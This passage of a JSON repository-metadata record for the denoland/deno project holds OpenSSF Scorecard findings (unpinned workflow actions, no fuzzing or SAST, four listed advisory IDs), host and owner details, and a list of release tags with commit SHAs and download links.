GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.m